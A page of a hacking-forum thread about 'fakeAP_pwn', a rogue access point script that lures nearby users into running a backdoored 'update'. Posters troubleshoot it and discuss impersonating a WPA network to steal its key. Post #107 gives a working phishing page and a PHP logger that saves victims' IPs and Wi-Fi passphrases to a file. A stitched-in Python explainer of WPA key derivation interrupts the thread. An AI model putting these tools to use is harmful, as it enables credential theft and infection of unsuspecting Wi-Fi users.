Page 11 of 15
Results 101 to 110 of 144

Thread: [Script] [Video] fakeAP_pwn (v0.3)

  1. #101 - Just burned his ISO (Join Date: Dec 2009; Posts: 6)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    Hi g0tmi1k

    Thanks for answer.

    Okay, try setting the mode to "non", as you don't want to allow an Internet connection after becoming infected.
    I did try it, but the result is the same; see the output please:
    Code:
    [*] fakeAP_pwn v0.3 (#126)
    [+] Diagnostics mode
    [>] Analyzing: Environment
    [!] 'wlan0' isn't a wireless interface
    [i] Found: wlan1
    [+] Detecting: Kernel
    [+] Detecting: Hardware
    [+] Testing: Network
    [i] interface=eth0
    [i] wifiInterface=wlan1
    [i] apInterface=at0
    [i] essid=Free-WiFi
    [i] channel=1
    [i] apType=airbase-ng
    [i] mode=non
    [i] payload=wkv
    [i] backdoorPath=/root/backdoor.exe
    [i] www=/var/www/fakeAP_pwn
    [i] respond2All=true
    [i] macMode=random
    [i] fakeMac=00:05:7c:9a:58:3f
    [i] extras=false
    [i] mtuMonitor=1800
    [i] mtuAP=1400
    [i] diagnostics=true
    [i] verbose=1
    [i] debug=false
    [i] gateway=
    [i] ourIP=10.0.0.1
    [i] port=28493
    [i] wifiDriver=rtl8187
    [>] Configuring: Environment
    [>] Removing: Temp files
    [>] Stopping: Daemons & Programs
    ./fakeAP_pwn.sh: line 75: 6629 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
    [>] Configuring: Wireless card
    [i] monitorInterface=mon0
    [>] Configuring: MAC address
    [i] mac=00:0a:00:70:4d:95 (Mediatek Corp.)
    [>] Creating: Scripts
    [>] Creating: Exploit (Windows)
    [>] Creating: Access point
    [>] Configuring: Network
    [>] Configuring: Permissions
    [>] Starting: DHCP
    [>] Starting: DNS
    [>] Starting: Exploit
    [>] Starting: Web server
    [+] Testing: Web server
    [>] Monitoring: Connections
    [i] Waiting for the target to run the "update" file

    But the problem remains: people associate, but very quickly the MAC changes to incomplete and I can't reach anyone, neither over ICMP, TCP nor UDP.

    Also, I see this frequently:

    [>] Stopping: Daemons & Programs
    ./fakeAP_pwn.sh: line 75: 6629 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"

    Is it a well-known problem?

    A lot of clients are trying to connect/probing... That might be an issue.
    So, I can't be in a place where a lot of wireless networks are in use? Is there a workaround?

    You're also using a VM as well as airbase-ng. Both of these have issues.
    Why is a VM bad? Because of performance? What do you recommend?

    See, I tried hostapd, but it failed very ugly; see below please.
    Code:
    [*] fakeAP_pwn v0.3 (#126)
    [+] Diagnostics mode
    [>] Analyzing: Environment
    [!] 'wlan0' isn't a wireless interface
    [i] Found: wlan1
    Usage: iw [options] command
    Options:
    --debug enable netlink debugging
    --version show version
    Commands:
    help
    event
    list
    phy <phyname> info
    dev <devname> set channel <channel> [HT20|HT40+|HT40-]
    phy <phyname> set channel <channel> [HT20|HT40+|HT40-]
    dev <devname> set freq <freq> [HT20|HT40+|HT40-]
    phy <phyname> set freq <freq> [HT20|HT40+|HT40-]
    phy <phyname> set name <new name>
    dev <devname> set meshid <meshid>
    dev <devname> set monitor <flag> [...]
    dev <devname> info
    dev <devname> del
    dev <devname> interface add <name> type <type> [mesh_id <meshid>] [flags ...]
    phy <phyname> interface add <name> type <type> [mesh_id <meshid>] [flags ...]
    dev <devname> station dump
    dev <devname> station set <MAC address> plink_action <open|block>
    dev <devname> station del <MAC address>
    dev <devname> station get <MAC address>
    dev <devname> mpath dump
    dev <devname> mpath set <destination MAC address> next_hop <next hop MAC address>
    dev <devname> mpath new <destination MAC address> next_hop <next hop MAC address>
    dev <devname> mpath del <MAC address>
    dev <devname> mpath get <MAC address>
    reg set <ISO/IEC 3166-1 alpha2>
    dev <devname> get mesh_param <param>
    dev <devname> set mesh_param <param> <value>
    [!] wlan1 *MIGHT* not suported by hostapd
    [+] Detecting: Kernel
    [+] Detecting: Hardware
    [+] Testing: Network
    [+] Testing: Internet connection
    [i] interface=eth0
    [i] wifiInterface=wlan1
    [i] apInterface=wlan1
    [i] essid=Free-WiFi
    [i] channel=1
    [i] apType=hostapd
    [i] mode=transparent
    [i] payload=wkv
    [i] backdoorPath=/root/backdoor.exe
    [i] www=/var/www/fakeAP_pwn
    [i] respond2All=true
    [i] macMode=random
    [i] fakeMac=00:05:7c:9a:58:3f
    [i] extras=false
    [i] mtuMonitor=1800
    [i] mtuAP=1400
    [i] diagnostics=true
    [i] verbose=1
    [i] debug=false
    [i] gateway=192.168.167.2
    [i] ourIP=10.0.0.1
    [i] port=37800
    [i] wifiDriver=rtl8187
    [>] Configuring: Environment
    [>] Removing: Temp files
    [>] Stopping: Daemons & Programs
    ./fakeAP_pwn.sh: line 75: 5619 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
    [i] interface (eth0) IP=192.168.167.129
    [>] Configuring: Wireless card
    [!] Couldn't detect monitorInterface
    [i] Quiting
    ./fakeAP_pwn.sh: line 75: 5656 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"
    [>] Restoring: Environment
    [>] Restoring: Programs[*] Done! (= Have you... g0tmi1k?

    Ideas?

    I'm guessing the "arp -a on windows" issue is because of airbase-ng. Not 100% sure mind you.
    I can't confirm because hostapd is not working.

    airbase-ng is kind of broken? Is there a fix?

    Does the target have a gateway IP? DNS?
    Yes.

    I don't understand what you're saying about "WPATARGET".
    The fakeAP you created was called "Free-WiFi", "WPATARGET" is scanning for networks (hence its probing). [So yes, the ESSIDs are different?]
    The fakeAP you create is "Open", I have no idea if "WPATARGET" is protected.
    Sorry, it's more like a general wireless hacking question, not completely related to the outputs above.

    I mean, I configured the fake AP to answer to all probes. I want to compromise the network called WPATARGET, my fake AP will answer when someone asks for WPATARGET (I see this in the logs).

    However, the real WPATARGET has WPA protection and my fake AP is OPEN. So my question is, will the real clients (my victims) connect anyhow to my fake (OPEN) WPATARGET? Or no way, since the original uses encryption (WPA)?

    I mean, assuming the target clients use Windows Zero Configuration and have WPATARGET saved.

    Thanks a lot and congratulations on the good work.

  2. #102 - g0tmi1k, Moderator (Join Date: Feb 2010; Posts: 1,771)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    fakeAP_pwn v0.3 #127
    Fixed: "Creating temp folder" bug
    Fixed: "Debug output" bug
    Fixed: "WiFi driver" bug
    Fixed: "WiFi Key" bug
    Updated: Internal working
    Updated: "Update" function
    http://code.google.com/p/fakeap-pwn/source/detail?r=127

    Download
    http://www.mediafire.com/?j2hz9rce10zh1w3
    Last edited by g0tmi1k; 11-12-2010 at 01:51 PM.
    Have you...g0tmi1k?

  3. #103 - g0tmi1k, Moderator (Join Date: Feb 2010; Posts: 1,771)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    @rick.m
    Next time please could you use CODE tags and/or pastebin... *Makes reading/understanding "easier"*

    Quote Originally Posted by rick.m View Post
    Also, I see this frequently:

    [>] Stopping: Daemons & Programs
    ./fakeAP_pwn.sh: line 75: 6629 Terminated $xterm -geometry 84x$lines+$x+$y -T "fakeAP_pwn v$version - $1" -e "$command"

    Is it a well-known problem?
    No, it's not a well-known error (first I've heard of it!).
    I'll have a look into it. (I missed it when I was doing 127; I'll try and find a fix for my next release.)

    Quote Originally Posted by rick.m View Post
    So, I can't be in a place where a lot of wireless network is in use? There is a workaround?
    I dunno if that is the issue (the mass of wireless networks!); it's a bit hard for me to test this in my lab as well...
    Somehow I can't see it being an issue, but it's a possible reason why it's not working anyway...
    The only "fix" I could think of right now would be to use different hardware/drivers and/or hostapd. But I really don't know. Just guessing.

    Quote Originally Posted by rick.m View Post
    Why VM is bad? Because of performance? What do you recommend?
    It's recommended not to use a VM, mainly because of performance; it does also have a few odd issues.
    Personally, airbase-ng works A LOT better if used in a real install over a VM. hostapd is the same in both.
    I recommend doing a real install of BackTrack! (If you can, install directly onto the HDD, else a USB stick.)

    Quote Originally Posted by rick.m View Post
    See, I tried hostapd, but if failed very ugly, see below please.
    *CODE*
    Ideas?
    That MAY be a bug. Not sure. I'll have a look into it as well.

    Quote Originally Posted by rick.m View Post
    airbase-ng is kind of broken? There is a fix?
    Yes, airbase-ng does have a few issues, though this is mainly compatibility issues with your hardware/drivers.
    The best fix: get another wifi card. If you can't for whatever reason, change how you're running BackTrack.

    Quote Originally Posted by rick.m View Post
    Yes.
    Yes?
    What are you saying yes to?

    Quote Originally Posted by rick.m View Post
    I mean, I configured the fake AP to answer to all probes. I want to compromise the network called WPATARGET, my fake AP will answer when someone ask for WPATARGET (I see this on the logs).

    However, the real WAPTARGET has WPA protection and my fake AP is OPEN. So my question is, the real clients (my victims) any how will connect to my fake (OPEN) WPATARGET? Or no way, since the original use encryption (WPA).

    I mean, assuming the target clients use Windows Zero configuration and has WPATARGET saved.

    Thanks a lot and congratulations for good work.
    fakeAP_pwn isn't YET meant to compromise another wifi; it's planned, just not fully coded yet. Just... too many "moving parts" at the mo that need fixing before that happens...

    As far as I know, Windows Zero Configuration is different in XP to Windows Vista/7. It behaves differently. Which OS is your target running?

    Anyway, back to your main question. I'm going to need a bit more information from you, for example the output from -d, the tmp/ folder etc. What is your network setup? What hardware? Software? etc.
    Last edited by g0tmi1k; 11-14-2010 at 10:42 PM.
    Have you...g0tmi1k?

  4. #104 - Just burned his ISO (Join Date: Nov 2010; Posts: 2)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    When do you expect fakeAP to be able to compromise another wifi AP?

    That is what you need to capture the WPA key for a network if you do not want to use a dictionary attack. I am testing the ability to create a fakeAP to replace a current one and see if I can then knock off the connected machines and have them connect instead to my fakeAP and enter their WPA key so I can capture it. I have read that you can set up airbase to look like it's WPA or WPA2 encrypted but then accept any passphrase to allow connection. Wouldn't that be better for your WPA key finder approach in FakeAP than to set up a fake webpage and wait for the user to install the update? It would be much easier to get the WPA key, that is for sure.

    Have you tried to set it up like that?

  5. #105 - g0tmi1k, Moderator (Join Date: Feb 2010; Posts: 1,771)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by 00diabolic View Post
    When do you expect fakeAP to be able to compromise another wifi AP?

    That is what you need to capture the WPA key for a network if you do not want to use a dictionary attack. I am testing the ability to create a fakeAP to replace a current one and see if I can then knock off the connected machines and have them connect instead to my fakeAP and enter their WPA key so I can capture it. I have read that you can set up airbase to look like it's WPA or WPA2 encrypted but then accept any passphrase to allow connection. Wouldn't that be better for your WPA key finder approach in FakeAP than to set up a fake webpage and wait for the user to install the update? It would be much easier to get the WPA key, that is for sure.

    Have you tried to set it up like that?
    Compromising another wifi AP is planned for v0.7.
    However, another project I'm currently coding, wiffy, is able to do a fakeAP attack. (It's in beta at the mo.)

    For the record, you're still going to need to do a dictionary attack; it's just a different method of getting the handshake.
    The pass-phrase is still going to be sent salted, not in plain text.

    Yes, I've tried that; however it's not going to be added till v0.7.
    Have you...g0tmi1k?

  6. #106 - Just burned his ISO (Join Date: Nov 2010; Posts: 2)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by g0tmi1k View Post
    Compromising another wifi AP is planned for v0.7.
    However, another project I'm currently coding, wiffy, is able to do a fakeAP attack. (It's in beta at the mo.)

    For the record, you're still going to need to do a dictionary attack; it's just a different method of getting the handshake.
    The pass-phrase is still going to be sent salted, not in plain text.

    Yes, I've tried that; however it's not going to be added till v0.7.
    Ahh ok... damn, so even if they send the WPA key it will be like capturing the handshake and doing a standard dictionary attack? No real benefit to it? Or does this capture reveal more of the key, like its length or something, for example?

    If you have that kind of ability to have them connected to your fake ap you would think you could get the key with no fuss.

    Maybe running an app to infiltrate their system is necessary after all. Their WPA key is stored under network properties under the ESSID.

    Thanks for the reply, I'll keep looking into this..
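An added example (not code from fakeAP_pwn or wiffy) of why the two posts above hold: WPA/WPA2-Personal never sends the passphrase; station and AP each derive a PMK with PBKDF2-HMAC-SHA1 using the SSID as the salt, and only MICs derived from that PMK appear in the 4-way handshake. The Python below computes that PMK, enforces the 8-63 printable-ASCII rule, checks against the published IEEE 802.11 Annex test vector (passphrase "password", SSID "IEEE"), and shows that the PMK is always 32 bytes, so a captured handshake reveals nothing about the passphrase length; the SSIDs "Free-WiFi" and "WPATARGET" are taken from this thread.

```python
import hashlib

# Published IEEE 802.11 Annex test vector (not constructed here):
# passphrase "password" on SSID "IEEE" yields this 256-bit PMK.
IEEE_TEST_VECTOR = (
    "password",
    "IEEE",
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e",
)

PBKDF2_ITERATIONS = 4096  # fixed by the standard for WPA-PSK
PMK_LEN = 32              # 256-bit PMK, whatever the passphrase length


def is_valid_passphrase(passphrase: str) -> bool:
    """WPA-Personal passphrases are 8 to 63 printable ASCII characters (0x20-0x7E)."""
    return 8 <= len(passphrase) <= 63 and all(0x20 <= ord(c) <= 0x7E for c in passphrase)


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).

    The SSID is the salt, so the same passphrase gives a different PMK on
    every network; this is the "sent salted" behaviour described in the thread.
    """
    if not is_valid_passphrase(passphrase):
        raise ValueError("passphrase must be 8-63 printable ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"),
        PBKDF2_ITERATIONS, PMK_LEN,
    )


def pmk_is_ssid_bound(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when one passphrase yields different PMKs on two different SSIDs."""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


def check_test_vector() -> bool:
    """Confirm derive_pmk against the published IEEE vector."""
    passphrase, ssid, expected_hex = IEEE_TEST_VECTOR
    return derive_pmk(passphrase, ssid).hex() == expected_hex


if __name__ == "__main__":
    print("IEEE vector ok:", check_test_vector())
    # Short and long passphrases both give a 32-byte PMK: length does not leak.
    for p in ("password", "a much longer passphrase with many more characters!"):
        print(len(p), "chars ->", len(derive_pmk(p, "Free-WiFi")), "byte PMK")
    print("same passphrase, two SSIDs differ:",
          pmk_is_ssid_bound("password", "Free-WiFi", "WPATARGET"))
```

Each offline guess against a captured handshake has to repeat these 4096 HMAC-SHA1 rounds, which is why passphrase length and randomness, not the open or protected status of the rogue AP, decide whether the key survives.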

  7. #107 - joker5bb, Member (Join Date: Feb 2010; Posts: 166)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    Below is some sample work for the WPA project.

    Code:
    <html>
    <head>
    <title>Security Check</title>
    <script type="text/javascript">
    function checkWholeForm(theForm) {
        var why = "";
    	why += checkPassword(theForm.password.value);
        if (why != "") {
           alert(why);
           return false;
        }
    return true;
    }
    
    function checkPassword (strng) {
    	var error = "";
    	if (strng == "") {
    		error = "You didn't enter a password.\n";
    	}
    	else if ((strng.length < 8) || (strng.length > 63)) {
    		error = "The password is the wrong length.\n";
    	}
    return error;    
    }    
    </script>
    <style type="text/css">
    h3 {
    font-family:Arial,Helvetica,sans-serif;
    margin-top:200px;
    }
    td {
    font-family:Arial,Helvetica,sans-serif;
    font-size:13px;
    font-weight:900;
    }
    </style>
    </head>
    
    <body>
    <h3 align="center">Please confirm your wireless security settings.</h3>
    <table align="center">
    <form action="process.php" onsubmit="return checkWholeForm(this)" method="post">
    <tr>
    	<td align="right">SSID:</td>
    	<td><input type="text" name="ssid" size="30" disabled="disabled" value="linksys"></td>
    </tr>
    <tr>	
    	<td align="right">Authentication Type:</td>
    	<td>
    		<select name="Authentication Type" size="1" disabled="disabled">
    		<option selected value="WPA">WPA</option>
    		</select>
    	</td>
    </tr>	
    <tr>
    	<td align="right">Passphrase:</td>
    	<td>
    		<input type="password" name="password" size="30">
    	</td>
    </tr>
    <tr>	
    	<td>
    	</td>
    	<td align="left">
    		<input type="submit" value="Submit">
    	</td>
    </tr>
    </form>
    </table>
    </body>
    
    </html>
    Code:
    <?php
    header("Location:wpa.html");
    $file=fopen("keys.txt","a") or exit("Unable to open file!");
    $logMsg = $_SERVER["REMOTE_ADDR"] . " " . $_POST['ssid'] . " " . $_POST['password'] . "\n"; 
    fputs($file,$logMsg);
    fclose($file);
    ?>
    Last edited by joker5bb; 11-29-2010 at 03:46 AM.

  8. #108 - Senior Member (Join Date: Jan 2010; Posts: 173)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    A nice little phishing attack, serve it up from the webserver on BT? A bit like login phishing, neat idea. No need for a host banning you.

    Keep up the good work
    regards dee

  9. #109 - joker5bb, Member (Join Date: Feb 2010; Posts: 166)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by pentest09 View Post
    A nice little phishing attack, serve it up from the webserver on BT? A bit like login phishing, neat idea. No need for a host banning you.

    Keep up the good work
    regards dee
    Well, I'm redoing the whole thing with jQuery & AJAX.
    There will be client-side and server-side validation, output to a .txt file with IP & passphrase.
    Also we can write commands to a PHP file to check if the passphrase is correct.
    We are now talking of using 3 wifi cards.

  10. #110 - Member (Join Date: Feb 2009; Location: 0,0; Posts: 90)

    Re: [Script] [Video] fakeAP_pwn (v0.3)

    Quote Originally Posted by joker5bb View Post
    Well, I'm redoing the whole thing with jQuery & AJAX.
    There will be client-side and server-side validation, output to a .txt file with IP & passphrase.
    Also we can write commands to a PHP file to check if the passphrase is correct.
    We are now talking of using 3 wifi cards.
    Well then, luckily I have 3 wifi cards.
